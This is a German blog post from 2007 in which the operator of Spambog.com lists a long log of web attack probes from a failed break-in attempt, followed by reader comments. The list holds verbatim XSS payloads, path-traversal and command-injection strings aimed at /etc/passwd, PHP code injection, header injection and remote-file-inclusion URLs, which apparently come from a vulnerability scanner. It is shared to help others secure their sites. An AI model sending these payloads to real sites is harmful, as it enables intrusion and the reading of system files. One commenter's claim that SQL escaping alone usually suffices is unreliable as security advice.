Hackversuch durch Injektionen gescheitert…
Am 18.03.2007 hat irgend jemand versucht, Spambog.com durch diverse Injektionen zu hacken bzw. Schwachstellen ausfindig zu machen. Aber ich lege bei der Entwicklung meiner Projekte sehr starken Wert auf Sicherheit, da ich früher schon einmal sehr schlechte Erfahrungen gemacht habe. Also, konnte der Angreifer natürlich keine Erfolge erzielen. Ist aber schon sehr interessant, mit welchen Injektionen er es versucht hat. Ich liste die Injektionen mal auf, denn es könnte für den Einen oder Anderen von Vorteil sein, um die Sicherheit seiner Projekte zu erhöhen!
?c=”+src=”http://testphp.acunetix.com/xss.js”>
?c=”+onmouseover=”alert(1186525764)&l=de
?c=”+onmouseover=”alert(1906889726)
?c=”+src=”http://testphp.acunetix.com/xss.js”>&l=de
?c=%253CScRiPt%253Ealert(772906860)%3B%253C/ScRiPt%253E&l=de
?c=%253CScRiPt%253Ealert(604869641)%3B%253C/ScRiPt%253E
?c=’+style=’background:url(JaVaScRiPt:alert(382896037))’+invalidparam=’
?c=&l=de
?c=’+style=’background:url(JaVaScRiPt:alert(1087053879))’+invalidparam=’&l=de
?c=?c=&l=de
?c=?c=
?c=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28557486518%29%3B%22%3E
?c=&l=de
?c=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281317026013%29%3B%22%3E&l=de
?c=&l=de
?c=../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././etc/passwd
?c=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
?c=../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././etc/passwd&l=de
?c=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&l=de
?c=t>
?c=&l=de
?c=t>&l=de
?c=..\..\..\..\..\..\..\..\etc/passwd&l=de
?c=..\..\..\..\..\..\..\..\etc/passwd
?c=/./././././././etc/passwd
?c=<%00script>alert(1007688910)%3B&l=de
?c=<%00script>alert(1331821345)%3B
?c=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28209471317%29%3B%22%3E
?c=/./././././././etc/passwd&l=de
?c=\”
?c=\”&l=de
?c=[img]JaVaScRiPt:alert(1871529272)%3B[/img]
?c=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28434717986%29%3B%22%3E&l=de
?c=[img]JaVaScRiPt:alert(1212134897)%3B[/img]&l=de
?c=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
?c=/etc/passwd&l=de
?c=/etc/passwd
?c=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&l=de
?c=\’
?c=%7Ccat+/etc/passwd&l=de
?c=%7Ccat+/etc/passwd
?c=’”
?c=\’&l=de
?c=’”&l=de
?c=email@somealert(264209081)%3Bdomain.com
?c=–>alert(462706367)%3B&l=de
?c=–>alert(1790368656)%3B
?c=email@somealert(72579036)%3Bdomain.com&l=de
?c=”%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
?c=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
?c=”%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&l=de
?c=../../../../../../../../etc/passwd%00.jpg&l=de
?c=../../../../../../../../etc/passwd%00.jpg
?c=../../../../../../../../etc/passwd%00.html
?c=%3Bcat+/etc/passwd%3B
?c=cat+/etc/passwd
?c=%3Bcat+/etc/passwd%3B&l=de
?c=%00′&l=de
?c=%00′
?c=”
?c=alert(919134291)%3B&l=de
?c=alert(1768257748)%3B
?c=alert(1630157459)%3B
?c=’%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
?c=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&l=de
?c=’%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&l=de
?c=http://testphp.acunetix.com/acunetix_file_inclusion_test?&l=de
?c=http://testphp.acunetix.com/acunetix_file_inclusion_test?
?c=%00../../../../../../../../etc/passwd
?c=../../../../../../../../etc/passwd%00.html&l=de
?c=%00../../../../../../../../etc/passwd&l=de
?c=%60cat+/etc/passwd%60
?c=cat+/etc/passwd&l=de
?c=%60cat+/etc/passwd%60&l=de
?c=”&l=de
?c=%2527&l=de
?c=%2527
?c=>”>alert(2134339331)%3B
?c=alert(1519827714)%3B&l=de
?c=>”>alert(34720110)%3B&l=de
?c=http://www.acunetix.com
?c=http://www.acunetix.com&l=de
?c=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
?c=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&l=de
?c=&l=de
?c=)&l=de
?c=)
?c=’&l=de
?c=’
?c=’&l=de
?c=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
?c=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&l=de
?c=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&l=de
?c=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
?c=http://www.acunetix-long-name-with-some-inexistent-host.com/
?c=http://www.acunetix-long-name-with-some-inexistent-host.com/&l=de
?c=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
?c=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&l=de
?c=&l=de
?c=/some_inexistent_file_with_long_name&l=de
?c=/some_inexistent_file_with_long_name
?c=http://some-inexistent-website.com/some_inexistent_file_with_long_name&l=de
?c=http://some-inexistent-website.com/some_inexistent_file_with_long_name
?c=../../../../../../../../etc/passwd%00&l=de
?c=../../../../../../../../etc/passwd%00
?c=../../../../../../../../etc/passwd&l=de
?c=../../../../../../../../etc/passwd
?c=+%0acat+/etc/passwd%0a
?c=+%26cat+/etc/passwd%26
?c=+%0acat+/etc/passwd%0a&l=de
?c=+%26cat+/etc/passwd%26&l=de
?c=%27
?c=%27&l=de
?c=’&l=de
?c=’
?c=>’>alert(521771639)%3B&l=de
?c=alert(1748115009)%3B&l=de
?c=>’>alert(1297648744)%3B
Am 27. Mai 2007 um 17:38 Uhr
Es ist offensichtlich, dass diese Versuche einer SQL-Injection nicht per Hand ausgeführt wurden sondern mit Hilfe des Tools “Acunetix Web Vulnerability Scanner”. Das Programm probiert (eigentlich stupide) sowohl XSS, SQL-Injection als auch LFI (Local file inclusion)-Lücken zu finden.
Eine Filterung durch mysql_real_escape_string sollte in der Regel genügen um dem Problem Herr zu werden…
Am 27. Mai 2007 um 20:16 Uhr
Sehr schön, dass trotzdem alles so gut weiterläuft
Finde den Dienst superdupergut!! Bitte weiter so!!
Am 20. Juni 2007 um 12:33 Uhr
Finde den Dienst ebenfalls gut… nur ich müsste mit dir (ersteller - spambog) mal reden.. Wie kann ich mein Board schützen.. schau am besten mal bei chakichan.de.tl nach und lad dir s neue antiexpl runder.. kannst du mir dann sagen, was ich eintragen mus, um so eine attacke zu verhindern?
Am 8. Juli 2007 um 18:00 Uhr
Ja jetzt ist es doch passiert. Aber Vorkehrungen sind schon da gewesen. Das Problem das jetzt besteht ist sogar als High-Risk einzustufen. Mehr Informationen findet Ihr hier: http://235sr.23.funpic.de/?p=27
Gut das die Beseitigung schon im Gange ist.
Euer
JdM